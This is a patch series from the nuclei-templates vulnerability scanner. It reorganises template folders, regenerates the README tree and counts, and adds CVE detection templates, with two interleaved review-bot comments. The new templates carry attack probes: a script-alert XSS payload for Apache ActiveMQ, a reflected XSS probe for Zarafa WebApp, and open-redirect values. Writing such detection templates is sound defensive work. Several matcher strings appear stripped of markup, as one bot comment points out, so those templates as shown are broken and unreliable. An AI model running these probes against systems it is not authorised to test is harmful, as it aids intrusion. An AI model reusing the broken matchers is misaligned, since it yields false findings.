@@ -10,7 +10,7 @@ info: workflows: - - template: panels/grafana-detect.yaml + - template: exposed-panels/grafana-detect.yaml subtemplates: - - template: default-credentials/grafana-default-credential.yaml \ No newline at end of file + - template: default-logins/grafana-default-credential.yaml \ No newline at end of file diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 00fc16e057..f2e06b990f 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: technologies/jira-detect.yaml + - template: exposed-panels/jira-detect.yaml subtemplates: - template: cves/2017/CVE-2017-9506.yaml @@ -23,8 +23,4 @@ workflows: - template: cves/2019/CVE-2019-11581.yaml - template: cves/2020/CVE-2020-14179.yaml - template: cves/2020/CVE-2020-14181.yaml - - template: security-misconfiguration/jira-service-desk-signup.yaml - - template: security-misconfiguration/jira-unauthenticated-dashboards.yaml - - template: security-misconfiguration/jira-unauthenticated-popular-filters.yaml - - template: security-misconfiguration/jira-unauthenticated-projects.yaml - - template: security-misconfiguration/jira-unauthenticated-user-picker.yaml + - template: vulnerabilities/jira/ diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml index 3202ca6986..f3b7a93901 100644 --- a/workflows/mida-eframework-workflow.yaml +++ b/workflows/mida-eframework-workflow.yaml @@ -14,4 +14,4 @@ workflows: matchers: - name: mida-eframework subtemplates: - - template: vulnerabilities/mida-eframework-xss.yaml + - template: vulnerabilities/other/mida-eframework-xss.yaml diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index 0a35bee6ab..349ce0f23b 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml 
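Review bot: Replacing the five explicit `security-misconfiguration/jira-*.yaml` entries in `jira-workflow.yaml` with `- template: vulnerabilities/jira/` changes the workflow from an enumerated list to "everything in that directory", so any template added to `vulnerabilities/jira/` later runs under this workflow without anyone deciding whether it belongs behind the `jira-detect` gate; the same pattern is introduced in `workflows/springboot-workflow.yaml` and `workflows/wordpress-workflow.yaml` in this commit. The README tree in the following auto-update patch lists exactly the five former entries under `vulnerabilities/jira`, so the current set is preserved. I can't verify from here which nuclei versions resolve a directory in `template:`, so a comment such as `# directory reference: every template under vulnerabilities/jira/ runs once jira-detect matches` would document the intent and the version assumption. The wordpress hunk additionally drops `files/wordpress-*.yaml` and `security-misconfiguration/wordpress-accessible-wpconfig.yaml`, which are presumably now under `vulnerabilities/wordpress/`; that directory listing is past the end of the visible README diff, so it is worth confirming none were lost in the move.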
@@ -10,7 +10,7 @@ info: workflows: - - template: panels/rabbitmq-dashboard.yaml + - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: - - template: default-credentials/rabbitmq-default-admin.yaml \ No newline at end of file + - template: default-logins/rabbitmq-default-admin.yaml \ No newline at end of file diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index e574b531cf..654c9f341e 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -9,8 +9,8 @@ info: # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: panels/solarwinds-orion.yaml + - template: exposed-panels/solarwinds-orion.yaml subtemplates: - template: cves/2018/CVE-2018-19386.yaml - template: cves/2020/CVE-2020-10148.yaml - - template: default-credentials/solarwinds-default-admin.yaml \ No newline at end of file + - template: default-logins/solarwinds-default-admin.yaml \ No newline at end of file diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index a4c9033dfd..996a91be43 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -15,5 +15,4 @@ workflows: - template: cves/2018/CVE-2018-1271.yaml - template: cves/2018/CVE-2018-1271.yaml - template: cves/2020/CVE-2020-5410.yaml - - template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml - - template: vulnerabilities/springboot-h2-db-rce.yaml + - template: vulnerabilities/springboot/ \ No newline at end of file diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 8b08889fc4..5c9a2d1181 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml 
@@ -16,17 +16,4 @@ workflows: - template: cves/2019/CVE-2019-15858.yaml - template: cves/2019/CVE-2019-6715.yaml - template: cves/2019/CVE-2019-9978.yaml - - template: files/wordpress-db-backup.yaml - - template: files/wordpress-debug-log.yaml - - template: files/wordpress-directory-listing.yaml - - template: files/wordpress-emergency-script.yaml - - template: files/wordpress-installer-log.yaml - - template: files/wordpress-tmm-db-migrate.yaml - - template: files/wordpress-user-enumeration.yaml - - template: security-misconfiguration/wordpress-accessible-wpconfig.yaml - - template: vulnerabilities/sassy-social-share.yaml - - template: vulnerabilities/w3c-total-cache-ssrf.yaml - - template: vulnerabilities/wordpress-social-metrics-tracker.yaml - - template: vulnerabilities/wordpress-wordfence-xss.yaml - - template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml - - template: vulnerabilities/easy-wp-smtp-listing.yaml \ No newline at end of file + - template: vulnerabilities/wordpress/ From 3b11f4f2cbcbd6202ffc4a223fc4fb1eb7f2b46a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Jan 2021 13:30:44 +0000 Subject: [PATCH 26/85] Auto Update README [Sat Jan 9 13:30:44 UTC 2021] :robot: --- README.md | 403 +++++++++++++++++++++++++++++------------------------- 1 file changed, 214 insertions(+), 189 deletions(-) diff --git a/README.md b/README.md index 6bc48cbd79..684ca2b63a 100644 --- a/README.md +++ b/README.md 
@@ -15,14 +15,14 @@ An overview of the nuclei template directory including number of templates and H | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | 147 | files | 50 | -| vulnerabilities | 42 | panels | 50 | -| technologies | 41 | security-misconfiguration | 29 | -| workflows | 17 | tokens | 8 | +| cves | 147 | files | 0 | +| vulnerabilities | 0 | panels | 0 | +| technologies | 44 | security-misconfiguration | 0 | +| workflows | 17 | tokens | 0 | | dns | 6 | fuzzing | 6 | -| generic-detections | 3 | default-credentials | 4 | -| subdomain-takeover | 2 | payloads | 2 | -| wordlists | 1 | misc | 14 | +| generic-detections | 0 | default-credentials | 0 | +| subdomain-takeover | 0 | payloads | 0 | +| wordlists | 0 | misc | 0 | ### Nuclei templates `v7.3.7` tree overview @@ -189,11 +189,15 @@ An overview of the nuclei template directory including number of templates and H │   ├── CVE-2020-9484.yaml │   ├── CVE-2020-9496.yaml │   └── CVE-2020-9757.yaml -├── default-credentials -│   ├── grafana-default-credential.yaml -│   ├── rabbitmq-default-admin.yaml -│   ├── solarwinds-default-admin.yaml -│   └── tomcat-manager-default.yaml +├── default-logins +│   ├── apache +│   │   └── tomcat-manager-default.yaml +│   ├── grafana +│   │   └── grafana-default-credential.yaml +│   ├── rabbitmq +│   │   └── rabbitmq-default-admin.yaml +│   └── solarwinds +│   └── solarwinds-default-admin.yaml ├── dns │   ├── azure-takeover-detection.yaml │   ├── cname-service-detector.yaml 
@@ -201,57 +205,106 @@ An overview of the nuclei template directory including number of templates and H │   ├── mx-service-detector.yaml │   ├── servfail-refused-hosts.yaml │   └── spoofable-spf-records-ptr.yaml -├── files -│   ├── apc-info.yaml -│   ├── cgi-test-page.yaml -│   ├── composer-config.yaml -│   ├── docker-registry.yaml -│   ├── domcfg-page.yaml -│   ├── druid-monitor.yaml -│   ├── drupal-install.yaml -│   ├── ds_store.yaml -│   ├── elasticsearch.yaml -│   ├── elmah-log-file.yaml -│   ├── error-logs.yaml -│   ├── exposed-kibana.yaml -│   ├── exposed-svn.yaml -│   ├── filezilla.yaml -│   ├── firebase-detect.yaml -│   ├── git-config.yaml -│   ├── graylog-api-browser.yaml -│   ├── htpasswd-detection.yaml -│   ├── jkstatus-manager.yaml -│   ├── jolokia.yaml -│   ├── laravel-env.yaml -│   ├── lazy-file.yaml -│   ├── magento-config.yaml -│   ├── owncloud-config.yaml -│   ├── package-json.yaml -│   ├── php-errors.yaml -│   ├── phpinfo.yaml +├── exposed-panels +│   ├── adminer-panel.yaml +│   ├── aims-password-mgmt-client.yaml +│   ├── atlassian-crowd-panel.yaml +│   ├── cisco-asa-panel.yaml +│   ├── citrix-adc-gateway-detect.yaml +│   ├── citrix-vpn-detect.yaml +│   ├── compal-panel.yaml +│   ├── crxde.yaml +│   ├── fortinet-fortigate-panel.yaml +│   ├── fortiweb-panel.yaml +│   ├── github-enterprise-detect.yaml +│   ├── gitlab-detect.yaml +│   ├── globalprotect-panel.yaml +│   ├── go-anywhere-client.yaml +│   ├── grafana-detect.yaml +│   ├── identityguard-selfservice-entrust.yaml +│   ├── iomega-lenovo-emc-shared-nas-detect.yaml +│   ├── jira-detect.yaml +│   ├── jmx-console.yaml +│   ├── manage-engine-admanager-panel.yaml +│   ├── mobileiron-login.yaml +│   ├── netscaler-gateway.yaml +│   ├── network-camera-detect.yaml +│   ├── oipm-detect.yaml +│   ├── parallels-html-client.yaml +│   ├── phpmyadmin-panel.yaml +│   ├── polycom-admin-detect.yaml │   ├── public-tomcat-instance.yaml -│   ├── redmine-db-config.yaml -│   ├── server-private-keys.yaml -│   ├── 
server-status-localhost.yaml -│   ├── shell-history.yaml -│   ├── sql-dump.yaml -│   ├── syfmony-profiler.yaml -│   ├── telerik-dialoghandler-detect.yaml -│   ├── telerik-fileupload-detect.yaml -│   ├── tomcat-scripts.yaml -│   ├── trace-axd-detect.yaml -│   ├── wadl-files.yaml -│   ├── web-config.yaml -│   ├── wordpress-db-backup.yaml -│   ├── wordpress-debug-log.yaml -│   ├── wordpress-directory-listing.yaml -│   ├── wordpress-emergency-script.yaml -│   ├── wordpress-installer-log.yaml -│   ├── wordpress-tmm-db-migrate.yaml -│   ├── wordpress-user-enumeration.yaml -│   ├── wsdl-detect.yaml -│   ├── xprober-service.yaml -│   └── zip-backup-files.yaml +│   ├── pulse-secure-panel.yaml +│   ├── rabbitmq-dashboard.yaml +│   ├── rsa-self-service.yaml +│   ├── sap-hana-xsengine-panel.yaml +│   ├── sap-netweaver-detect.yaml +│   ├── sap-recon-detect.yaml +│   ├── solarwinds-orion.yaml +│   ├── sonarqube-login.yaml +│   ├── sonicwall-management-panel.yaml +│   ├── sonicwall-sslvpn-panel.yaml +│   ├── sophos-fw-version-detect.yaml +│   ├── supervpn-panel.yaml +│   ├── tikiwiki-cms.yaml +│   ├── tomcat-manager-pathnormalization.yaml +│   ├── traefik-dashboard.yaml +│   ├── virtual-ema-detect.yaml +│   ├── weave-scope-dashboard-detect.yaml +│   ├── webeditors.yaml +│   ├── webmin-panel.yaml +│   ├── workspace-one-uem.yaml +│   └── workspaceone-uem-airwatch-dashboard-detect.yaml +├── exposed-tokens +│   ├── aws +│   │   ├── amazon-mws-auth-token-value.yaml +│   │   └── aws-access-key-value.yaml +│   ├── generic +│   │   ├── credentials-disclosure.yaml +│   │   ├── general-tokens.yaml +│   │   └── http-username-password.yaml +│   ├── google +│   │   ├── fcm-server-key.yaml +│   │   └── google-api-key.yaml +│   ├── mailchimp +│   │   └── mailchimp-api-key.yaml +│   └── slack +│   └── slack-access-token.yaml +├── exposures +│   ├── apis +│   │   ├── swagger-api.yaml +│   │   ├── wadl-api.yaml +│   │   └── wsdl-api.yaml +│   ├── backups +│   │   ├── sql-dump.yaml +│   │   └── 
zip-backup-files.yaml +│   ├── configs +│   │   ├── composer-config.yaml +│   │   ├── exposed-svn.yaml +│   │   ├── git-config-nginxoffbyslash.yaml +│   │   ├── git-config.yaml +│   │   ├── htpasswd-detection.yaml +│   │   ├── laravel-env.yaml +│   │   ├── magento-config.yaml +│   │   ├── owncloud-config.yaml +│   │   ├── package-json.yaml +│   │   ├── phpinfo.yaml +│   │   ├── redmine-db-config.yaml +│   │   ├── server-status-localhost.yaml +│   │   ├── syfmony-profiler.yaml +│   │   └── web-config.yaml +│   ├── files +│   │   ├── domcfg-page.yaml +│   │   ├── drupal-install.yaml +│   │   ├── ds_store.yaml +│   │   ├── filezilla.yaml +│   │   ├── lazy-file.yaml +│   │   ├── server-private-keys.yaml +│   │   └── xprober-service.yaml +│   └── logs +│   ├── elmah-log-file.yaml +│   ├── error-logs.yaml +│   └── trace-axd-detect.yaml ├── fuzzing │   ├── arbitrary-file-read.yaml │   ├── basic-auth-bruteforce.yaml @@ -259,11 +312,13 @@ An overview of the nuclei template directory including number of templates and H │   ├── generic-lfi-fuzzing.yaml │   ├── iis-shortname.yaml │   └── wp-plugin-scan.yaml -├── generic-detections -│   ├── basic-xss-prober.yaml -│   ├── general-tokens.yaml -│   └── top-15-xss.yaml -├── misc +├── helpers +│   ├── payloads +│   │   ├── CVE-2020-5776.csv +│   │   └── CVE-2020-6287.xml +│   └── wordlists +│   └── wp-plugins.txt +├── miscellaneous │   ├── basic-cors-flash.yaml │   ├── dir-listing.yaml │   ├── htaccess-config.yaml 
@@ -278,93 +333,46 @@ An overview of the nuclei template directory including number of templates and H │   ├── unencrypted-bigip-ltm-cookie.yaml │   ├── wp-xmlrpc.yaml │   └── xml-schema-detect.yaml -├── panels -│   ├── adminer-panel.yaml -│   ├── aims-password-mgmt-client.yaml -│   ├── atlassian-crowd-panel.yaml -│   ├── cisco-asa-panel.yaml -│   ├── citrix-adc-gateway-detect.yaml -│   ├── citrix-vpn-detect.yaml -│   ├── compal.yaml -│   ├── crxde.yaml -│   ├── docker-api.yaml -│   ├── fortinet-fortigate-panel.yaml -│   ├── fortiweb-panel.yaml -│   ├── github-enterprise-detect.yaml -│   ├── gitlab-detect.yaml -│   ├── globalprotect-panel.yaml -│   ├── go-anywhere-client.yaml -│   ├── grafana-detect.yaml -│   ├── identityguard-selfservice-entrust.yaml -│   ├── iomega-lenovo-emc-shared-nas-detect.yaml -│   ├── jenkins-asyncpeople.yaml -│   ├── jmx-console.yaml -│   ├── kubernetes-pods.yaml -│   ├── manage-engine-admanager-panel.yaml -│   ├── mobileiron-login.yaml -│   ├── netscaler-gateway.yaml -│   ├── network-camera-detect.yaml -│   ├── oipm-detect.yaml -│   ├── parallels-html-client.yaml -│   ├── phpmyadmin-panel.yaml -│   ├── polycom-admin-detect.yaml -│   ├── pulse-secure-panel.yaml -│   ├── rabbitmq-dashboard.yaml -│   ├── rsa-self-service.yaml -│   ├── sap-hana-xsengine-panel.yaml -│   ├── sap-netweaver-detect.yaml -│   ├── sap-recon-detect.yaml -│   ├── solarwinds-orion.yaml -│   ├── sonarqube-login.yaml -│   ├── sonicwall-management-panel.yaml -│   ├── sonicwall-sslvpn-panel.yaml -│   ├── sophos-fw-version-detect.yaml -│   ├── supervpn-panel.yaml -│   ├── swagger-panel.yaml -│   ├── tikiwiki-cms.yaml -│   ├── traefik-dashboard.yaml -│   ├── virtual-ema-detect.yaml -│   ├── weave-scope-dashboard-detect.yaml -│   ├── webeditors.yaml -│   ├── webmin-panel.yaml -│   ├── workspace-one-uem.yaml -│   └── workspaceone-uem-airwatch-dashboard-detect.yaml -├── payloads -│   ├── CVE-2020-5776.csv -│   └── CVE-2020-6287.xml -├── security-misconfiguration +├── 
misconfiguration │   ├── aem-groovyconsole.yaml │   ├── apache-tomcat-snoop.yaml +│   ├── apc-info.yaml │   ├── aspx-debug-mode.yaml +│   ├── aws-redirect.yaml │   ├── basic-cors.yaml +│   ├── basic-xss-prober.yaml +│   ├── cgi-test-page.yaml │   ├── django-debug-detect.yaml +│   ├── docker-api.yaml +│   ├── docker-registry.yaml +│   ├── druid-monitor.yaml │   ├── drupal-user-enum-ajax.yaml │   ├── drupal-user-enum-redirect.yaml +│   ├── elasticsearch.yaml +│   ├── exposed-kibana.yaml │   ├── exposed-service-now.yaml │   ├── front-page-misconfig.yaml -│   ├── jenkins-stack-trace.yaml -│   ├── jira-service-desk-signup.yaml -│   ├── jira-unauthenticated-dashboards.yaml -│   ├── jira-unauthenticated-popular-filters.yaml -│   ├── jira-unauthenticated-projects.yaml -│   ├── jira-unauthenticated-user-picker.yaml +│   ├── jkstatus-manager.yaml │   ├── jupyter-ipython-unauth.yaml +│   ├── kubernetes-pods.yaml │   ├── larvel-debug.yaml +│   ├── linkerd-ssrf-detect.yaml │   ├── manage-engine-ad-search.yaml +│   ├── php-errors.yaml │   ├── put-method-enabled.yaml │   ├── rack-mini-profiler.yaml │   ├── salesforce-aura-misconfig.yaml +│   ├── shell-history.yaml │   ├── sidekiq-dashboard.yaml │   ├── springboot-detect.yaml +│   ├── symfony-debugmode.yaml +│   ├── tomcat-scripts.yaml │   ├── unauthenticated-airflow.yaml -│   ├── unauthenticated-jenkin-dashboard.yaml │   ├── unauthenticated-nacos-access.yaml │   ├── wamp-xdebug-detect.yaml -│   ├── wordpress-accessible-wpconfig.yaml │   └── zenphoto-installation-sensitive-info.yaml -├── subdomain-takeover -│   ├── detect-all-takeovers.yaml -│   └── s3-subtakeover.yaml +├── takeovers +│   └── subdomain-takeover.yaml ├── technologies │   ├── apache-detect.yaml │   ├── artica-web-proxy-detect.yaml 
@@ -374,16 +382,17 @@ An overview of the nuclei template directory including number of templates and H │   ├── clockwork-php-page.yaml │   ├── couchdb-detect.yaml │   ├── favicon-detection.yaml +│   ├── firebase-detect.yaml │   ├── google-storage.yaml │   ├── graphql.yaml +│   ├── graylog-api-browser.yaml │   ├── home-assistant.yaml │   ├── jaspersoft-detect.yaml -│   ├── jira-detect.yaml +│   ├── jolokia.yaml │   ├── kibana-detect.yaml │   ├── kong-detect.yaml │   ├── liferay-portal-detect.yaml │   ├── linkerd-badrule-detect.yaml -│   ├── linkerd-ssrf-detect.yaml │   ├── lotus-domino-version.yaml │   ├── magmi-detect.yaml │   ├── mrtg-detect.yaml 
@@ -401,66 +410,82 @@ An overview of the nuclei template directory including number of templates and H │   ├── shiro-detect.yaml │   ├── sql-server-reporting.yaml │   ├── tech-detect.yaml +│   ├── telerik-dialoghandler-detect.yaml +│   ├── telerik-fileupload-detect.yaml │   ├── terraform-detect.yaml │   ├── tomcat-detect.yaml │   ├── tor-socks-proxy.yaml │   ├── waf-detect.yaml │   ├── weblogic-detect.yaml │   └── werkzeug-debugger-detect.yaml -├── tokens -│   ├── amazon-mws-auth-token-value.yaml -│   ├── aws-access-key-value.yaml -│   ├── credentials-disclosure.yaml -│   ├── fcm-server-key.yaml -│   ├── google-api-key.yaml -│   ├── http-username-password.yaml -│   ├── mailchimp-api-key.yaml -│   └── slack-access-token.yaml ├── vulnerabilities -│   ├── bullwark-momentum-series-directory-traversal.yaml -│   ├── cached-aem-pages.yaml -│   ├── couchdb-adminparty.yaml -│   ├── crlf-injection.yaml -│   ├── discourse-xss.yaml -│   ├── easy-wp-smtp-listing.yaml -│   ├── eclipse-help-system-xss.yaml -│   ├── git-config-nginxoffbyslash.yaml -│   ├── ibm-infoprint-directory-traversal.yaml -│   ├── mcafee-epo-rce.yaml -│   ├── microstrategy-ssrf.yaml -│   ├── mida-eframework-xss.yaml -│   ├── moodle-filter-jmol-lfi.yaml -│   ├── moodle-filter-jmol-xss.yaml -│   ├── nginx-module-vts-xss.yaml -│   ├── nuuo-nvrmini2-rce.yaml -│   ├── open-redirect.yaml -│   ├── oracle-ebs-bispgraph-file-access.yaml -│   ├── pdf-signer-ssti-to-rce.yaml -│   ├── rails6-xss.yaml -│   ├── rce-shellshock-user-agent.yaml -│   ├── rce-via-java-deserialization.yaml -│   ├── rconfig-rce.yaml -│   ├── sassy-social-share.yaml -│   ├── sick-beard-xss.yaml -│   ├── springboot-actuators-jolokia-xxe.yaml -│   ├── springboot-h2-db-rce.yaml -│   ├── symantec-messaging-gateway.yaml -│   ├── symfony-debugmode.yaml -│   ├── tikiwiki-reflected-xss.yaml -│   ├── tomcat-manager-pathnormalization.yaml -│   ├── twig-php-ssti.yaml -│   ├── vmware-vcenter-lfi-linux.yaml -│   ├── vmware-vcenter-lfi.yaml -│   ├── 
vpms-auth-bypass.yaml -│   ├── w3c-total-cache-ssrf.yaml -│   ├── wems-manager-xss.yaml -│   ├── wordpress-emails-verification-for-woocommerce.yaml -│   ├── wordpress-social-metrics-tracker.yaml -│   ├── wordpress-wordfence-xss.yaml -│   ├── wordpress-wpcourses-info-disclosure.yaml -│   └── zms-auth-bypass.yaml -├── wordlists -│   └── wp-plugins.txt +│   ├── generic +│   │   ├── crlf-injection.yaml +│   │   ├── top-xss-params.yaml +│   │   └── url-redirect.yaml +│   ├── ibm +│   │   ├── eclipse-help-system-xss.yaml +│   │   └── ibm-infoprint-directory-traversal.yaml +│   ├── jenkins +│   │   ├── jenkins-asyncpeople.yaml +│   │   ├── jenkins-stack-trace.yaml +│   │   └── unauthenticated-jenkin-dashboard.yaml +│   ├── jira +│   │   ├── jira-service-desk-signup.yaml +│   │   ├── jira-unauthenticated-dashboards.yaml +│   │   ├── jira-unauthenticated-popular-filters.yaml +│   │   ├── jira-unauthenticated-projects.yaml +│   │   └── jira-unauthenticated-user-picker.yaml +│   ├── moodle +│   │   ├── moodle-filter-jmol-lfi.yaml +│   │   └── moodle-filter-jmol-xss.yaml +│   ├── oracle +│   │   └── oracle-ebs-bispgraph-file-access.yaml +│   ├── other +│   │   ├── bullwark-momentum-series-directory-traversal.yaml +│   │   ├── cached-aem-pages.yaml +│   │   ├── couchdb-adminparty.yaml +│   │   ├── discourse-xss.yaml +│   │   ├── mcafee-epo-rce.yaml +│   │   ├── microstrategy-ssrf.yaml +│   │   ├── mida-eframework-xss.yaml +│   │   ├── nginx-module-vts-xss.yaml +│   │   ├── nuuo-nvrmini2-rce.yaml +│   │   ├── pdf-signer-ssti-to-rce.yaml +│   │   ├── rce-shellshock-user-agent.yaml +│   │   ├── rce-via-java-deserialization.yaml +│   │   ├── rconfig-rce.yaml +│   │   ├── sick-beard-xss.yaml +│   │   ├── symantec-messaging-gateway.yaml +│   │   ├── tikiwiki-reflected-xss.yaml +│   │   ├── twig-php-ssti.yaml +│   │   ├── vpms-auth-bypass.yaml +│   │   ├── wems-manager-xss.yaml +│   │   └── zms-auth-bypass.yaml +│   ├── rails +│   │   └── rails6-xss.yaml +│   ├── springboot +│   │   
├── springboot-actuators-jolokia-xxe.yaml +│   │   └── springboot-h2-db-rce.yaml +│   ├── vmware +│   │   ├── vmware-vcenter-lfi-linux.yaml +│   │   └── vmware-vcenter-lfi.yaml +│   └── wordpress +│   ├── easy-wp-smtp-listing.yaml +│   ├── sassy-social-share.yaml +│   ├── w3c-total-cache-ssrf.yaml +│   ├── wordpress-accessible-wpconfig.yaml +│   ├── wordpress-db-backup.yaml +│   ├── wordpress-debug-log.yaml +│   ├── wordpress-directory-listing.yaml +│   ├── wordpress-emails-verification-for-woocommerce.yaml +│   ├── wordpress-emergency-script.yaml +│   ├── wordpress-installer-log.yaml +│   ├── wordpress-social-metrics-tracker.yaml +│   ├── wordpress-tmm-db-migrate.yaml +│   ├── wordpress-user-enumeration.yaml +│   ├── wordpress-wordfence-xss.yaml +│   └── wordpress-wpcourses-info-disclosure.yaml └── workflows ├── artica-web-proxy-workflow.yaml ├── basic-auth-workflow.yaml @@ -483,7 +508,7 @@ An overview of the nuclei template directory including number of templates and H -**24 directories, 424 files**. +**49 directories, 424 files**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From df66d17de51f39b48c9db27d83349523ef343fdb Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sat, 9 Jan 2021 19:22:50 +0530 Subject: [PATCH 27/85] Update README.tmpl --- .github/scripts/README.tmpl | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 88a9083385..b564f8fccf 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl 
@@ -13,16 +13,15 @@ An overview of the nuclei template directory including number of templates and H ### Nuclei templates `{version}` overview -| Templates | Counts | Templates | Counts | -| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | {countTpl("cves/*")} | files | {countTpl("files")} | -| vulnerabilities | {countTpl("vulnerabilities")} | panels | {countTpl("panels")} | -| technologies | {countTpl("technologies")} | security-misconfiguration | {countTpl("security-misconfiguration")} | -| workflows | {countTpl("workflows")} | tokens | {countTpl("tokens")} | -| dns | {countTpl("dns")} | fuzzing | {countTpl("fuzzing")} | -| generic-detections | {countTpl("generic-detections")} | default-credentials | {countTpl("default-credentials")} | -| subdomain-takeover | {countTpl("subdomain-takeover")} | payloads | {countTpl("payloads")} | -| wordlists | {countTpl("wordlists")} | misc | {countTpl("misc")} | +| Templates | Counts | Templates | Counts | +| --------------- | ------------------------------- | ---------------- | ------------------------------ | +| cves | {countTpl("cves/*")} | default-logins | {countTpl("default-logins/*")} | +| dns | {countTpl("dns")} | exposed-panels | {countTpl("exposed-panels")} | +| exposed-tokens | {countTpl("exposed-tokens/*")} | exposures | {countTpl("exposures/*")} | +| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | +| miscellaneous | {countTpl("miscellaneous")} | misconfiguration | {countTpl("misconfiguration")} | +| takeovers | {countTpl("takeovers")} | technologies | {countTpl("technologies")} | +| vulnerabilities | {countTpl("vulnerabilities/*")} | workflows | {countTpl("workflows")} | ### Nuclei templates `{version}` tree overview From 664a6f3b042f7f60f6059cc31650869505d0c263 Mon Sep 17 00:00:00 2001 
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sat, 9 Jan 2021 20:15:11 +0530 Subject: [PATCH 28/85] more cves :fire: --- cves/2018/CVE-2018-7251.yaml | 18 ++++++++++++++++++ cves/2018/CVE-2018-8006.yaml | 20 ++++++++++++++++++++ cves/2019/CVE-2019-10092.yaml | 15 +++++++++++++++ cves/2019/CVE-2019-14223.yaml | 18 ++++++++++++++++++ cves/2019/CVE-2019-7219.yaml | 22 ++++++++++++++++++++++ cves/2019/CVE-2019-9955.yaml | 18 ++++++++++++++++++ cves/2020/CVE-2020-1943.yaml | 22 ++++++++++++++++++++++ 7 files changed, 133 insertions(+) create mode 100644 cves/2018/CVE-2018-7251.yaml create mode 100644 cves/2018/CVE-2018-8006.yaml create mode 100644 cves/2019/CVE-2019-10092.yaml create mode 100644 cves/2019/CVE-2019-14223.yaml create mode 100644 cves/2019/CVE-2019-7219.yaml create mode 100644 cves/2019/CVE-2019-9955.yaml create mode 100644 cves/2020/CVE-2020-1943.yaml diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml new file mode 100644 index 0000000000..cf0487f22b --- /dev/null +++ b/cves/2018/CVE-2018-7251.yaml @@ -0,0 +1,18 @@ +id: CVE-2018-7251 + +info: + name: AnchorCMS Error Log Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/anchor/errors.log' + matchers: + - type: word + words: + - '"date":' + - '"message":' + - '"trace":[' + condition: and diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml new file mode 100644 index 0000000000..bcf53c36ba --- /dev/null +++ b/cves/2018/CVE-2018-8006.yaml @@ -0,0 +1,20 @@ +id: CVE-2018-8006 + +info: + name: Apache ActiveMQ XSS + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68' + matchers-condition: and + matchers: + - type: word + words: + - '">' + - type: word + words: + - "/html" + part: header 
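Review bot: The body matcher in CVE-2018-8006.yaml is reduced to the single word `'">'`, which — unless the angle-bracket markup was lost when this patch was rendered — occurs on almost any HTML page, so the template effectively reports on the `/html` Content-Type check alone. The word should be the complete marker that the request reflects through `QueueFilter`, so that a hit proves reflection rather than the presence of a closing attribute quote. CVE-2019-7219.yaml and CVE-2020-1943.yaml later in this patch show the same reduced words (`\">` and `""`), and the sole word in CVE-2019-10092.yaml is likewise empty as rendered; they need the same check before merge.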
diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml new file mode 100644 index 0000000000..1531fab12e --- /dev/null +++ b/cves/2019/CVE-2019-10092.yaml @@ -0,0 +1,15 @@ +id: CVE-2019-10092 + +info: + name: Apache mod_proxy HTML Injection / Partial XSS + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/%5cgoogle.com/evil.html' + matchers: + - type: word + words: + - "
" \ No newline at end of file diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml new file mode 100644 index 0000000000..d0fca33dbf --- /dev/null +++ b/cves/2019/CVE-2019-14223.yaml @@ -0,0 +1,18 @@ +id: CVE-2019-14223 +info: + name: Alfresco Share Open Redirect + author: Ice3man + severity: low + +requests: + - method: POST + path: + - '{{BaseURL}}/share/page/dologin' + headers: + Content-Type: application/x-www-form-urlencoded + body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass + matchers: + - type: regex + part: body + regex: + - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$" \ No newline at end of file diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml new file mode 100644 index 0000000000..3aa09e4f66 --- /dev/null +++ b/cves/2019/CVE-2019-7219.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-7219 + +info: + name: Zarafa WebApp Reflected XSS + author: Ice3man + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/webapp/?fccc0\">5f43d=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\">" + - type: word + part: header + words: + - "/html" diff --git a/cves/2019/CVE-2019-9955.yaml 